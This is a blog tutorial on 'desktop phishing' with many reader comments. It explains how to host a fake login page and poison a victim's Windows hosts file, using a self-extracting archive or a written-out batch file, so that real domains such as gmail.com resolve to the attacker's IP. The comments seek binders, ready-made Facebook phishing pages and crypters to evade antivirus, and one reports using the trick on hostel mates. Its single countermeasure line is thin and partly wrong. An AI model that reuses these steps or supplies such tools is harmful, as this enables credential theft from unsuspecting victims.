Desktop Phishing - Step by step tutorial

 It is an advance form of phishing. Kindly read my previous post on normal phishing here before proceeding.Difference between phishing and desktop phishing is as follows.

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.






Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.

51 comments:

Post a Comment
  1. Nice post dude!

  2. as a computer repair tech, to me your information is invaluable. Keep up the great work.

  3. Thanx friendz :)

  4. well done bravo
    very nice artical
    thanks

  5. can u provide a link for a binder program...
    i've tried downloaded it but most of them have virus...

  6. I have a question, someone told me if i added an ip and a link. My computer will get hacked...is it true?

  7. well after i made some changes to my host file , i found that your method is not working at all,,,,i replaced xxx,,,,,,,with rediff's ip address but every time , & then typed google.com in my browser but my browser opened google.com instead of rediff.com
    what to do ?
    look here --

    # Copyright (c) 1993-2009 Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    # 102.54.94.97 rhino.acme.com # source server
    # 38.25.63.10 x.acme.com # x client host

    # localhost name resolution is handled within DNS itself.
    # 127.0.0.1 localhost
    # ::1 localhost

    195.59.122.43 google.com
    195.59.122.43 www.google.com

  8. @benooi Yeah, its not a good thing to reveal IP. But dont worry if victim is a layman.

    @anonymous
    The problem is that browser usually picks the IP addresses from DNS cache. Clear your browser history and everything.
    Moreover type this command
    ipconfig /flushdns
    and try again.

  9. it means i need to have access of victim's pc so i can wash out his browser history plus the dns flux...then its a flop show.

  10. thanks for the tremendous lectures.i want to ask how do i check on the passwords/usernames of my victim after sending the phished page to him.will it be in the htdocs or where.i need help. or how do i go about locating the username/password infos.

  11. @Anonymous if u create a batch file u can delete DNS cache by adding "ipconfig /flushdns"

    And if u create an SFX archive it provide an option to execute another program or batch file to perform setup

  12. Good job Aneesh M. Makker.I have found it very useful,my friend once gave me a phishing file,but i recognize it,Now i will show him what is desktop phishing

  13. super...........

  14. Can't it be done with IIS? should I use XAMPP or any software only?
    INFOTRON Krishna - "To Spread the wide knowledge of computers"

  15. gr8 post buddy...nt yet tried bt soon will... n let u know results

  16. Nice work... Keep it Up. :)

  17. CAN YOU PLEASE EXPLAIN IN DETAIL HOW TO USE XAMPP 1.7.3 I WANT TO SEE MY PAGE ANYWHERE IN WORLD.AND HOW TO USE IT FOR DYNAMIC IP ADDRESS

  18. CAN YOU PLEASE EXPLAIN IN DETAIL HOW TO USE XAMPP 1.7.3 I WANT TO SEE MY PAGE ANYWHERE IN WORLD.AND HOW TO USE IT FOR DYNAMIC IP ADDRESS

  19. hello what a hosting site you used for your page phising?
    for I can not find a site that allows

  20. hello what a hosting site you used for your page phising?
    for I can not find a site that works in by typing the ip

  21. fantabulous hacking trick dude, also seems like ur a php programmer,right??

  22. hey buddy i m doing this trick in ma hostel .... its juz g8

  23. hey Aneesh i want to be your STUDENT. kndly reply me if it is possible?
    i am waiting for your warm response
    harsit
    (harshitrules@in.com)

  24. gud

  25. hai it,s a nice post but how to detect it if i'm the victim

  26. please how can i locate my external ip

  27. Nice Post. Thanx

  28. Nice Post. Thanx

  29. hi can you please send me a ready made facebook phishing page I am a unce with this tuff and tell me how to get the info I have done the file mamanger thing on 3GB

    i am grateful

  30. how to host your site from desktop

  31. Brilliant.
    More tutorials that are like this, should be around the Net.
    Shots for this bro, you make me proud.

  32. Hey, i tried this out. But i noticed when you typ your url and hit enter; the domainname changes simultaneously to the genuine url... is that suppost to be normal? Thanks

  33. Aneesh M. Makker thanx for the info i have to share a thing may be i m wrong as i m new this field so:
    1st a question "in host file can we use no-ip address or some webhosting can b open like ip/~username can't we use that instead of server making if ip is dynamic then how can we do this as the router restarts it gets new ip of course not asking isp to make ip static as there are alot benefits of dynamic ip :-) ANY OTHER METHOD TO GET VICTOM?
    2nd i don't know is it me or don't know what host file does'nt effect the firefox as do't connect to the change ip web address.
    Best regards P_CHARSI

  34. plez help me!!!! when i type localhost nothing works as it should

  35. hy can i learn phising plzz..........

  36. Hello..
    can we make an static ip through file zilla client and upload our phiser page... and then this desktop phising works or not ?

  37. hello..
    can we upload our files to file zilla and can we get an static ip of ur phiser uploaded on file zilla... and then can we do desktop phising ?

  38. Thank you for providing wonderful information.

  39. Hi Aneesh,

    You are doing a great work here and I am pleased. How can I have a direct coaching from you like one week?
    Please I need to hear from you.
    I can send you my skype id if you can arrange that for me. A kind of be your scholar for sometime!
    Good luck and God bless...

    Nice.

  40. nice.... http://www.hvha.it/2012/04/speedup-internet-browsing-by-hosts-file.html

  41. isn't it suspicious to send a batch file?
    I want u people to comment on this.

  42. hey aneesh....really loved ur work...but i m encountering some problem wid ur batch file method....d problem is ki d host file is not getting modified at all...i made d batch file as per d steps given...but on double clicking on it,,dere is no change in d host file...wat am i doing wrong?

  43. what if you have two websites that you are hosting but there is one specfic on you want them to go too how would you include that into the hosts file..?

  44. It works but I was wondering if there was a way to replace the IP address with the file directory of a local file such as C:\\Test.html

  45. Its nt working

  46. Friend i have a problem for which i have been searching for so long but didn't get any solution so far. Can you tell me is it possible to redirect the victim to the original facebook so that second time he logs in successfully even though we have poisoned his host file in desktop phishing?I tried a script which works fine and redirects to normal facebook after phishing is done but while doing desktop phishing,it lands victim to the phished page only again and again after he enters his credentials . Any solution to this problem? And can you suggest me some really working FUD crypter which can protect the exe to poison host file from Anti Viruses?They usually spoil the fun by detecting and removing the changes made into host file of the victim. Please do reply. I have been knocking at the door of everyone from so long with this problem but so far no solution

  47. love this post... superb buddy..

  48. bro when i am sending the sfx file the victim's pc is showing a warning that there is a possible threat in the file and automatically deleting it :O help :(

  49. bro how can i host this phishing pages free..please help me i am waiting.. reply me on kumar_avi@live.com

  50. Nice Tutorial.!! But got a problem :( ..when i try to open Archived Host File..it opens My WIFI login Page insted of Pishing Facebook page...!!

  51. the tutorial is cool I will like to ask if I can get a sort of direct teaching from you, because have got a couple of questions and am really willing to learn. this is my id newlandmarkprince@yahoo.com . you can likewise add me on your messenger. thanks and look forward to hearing from you.

Post a Comment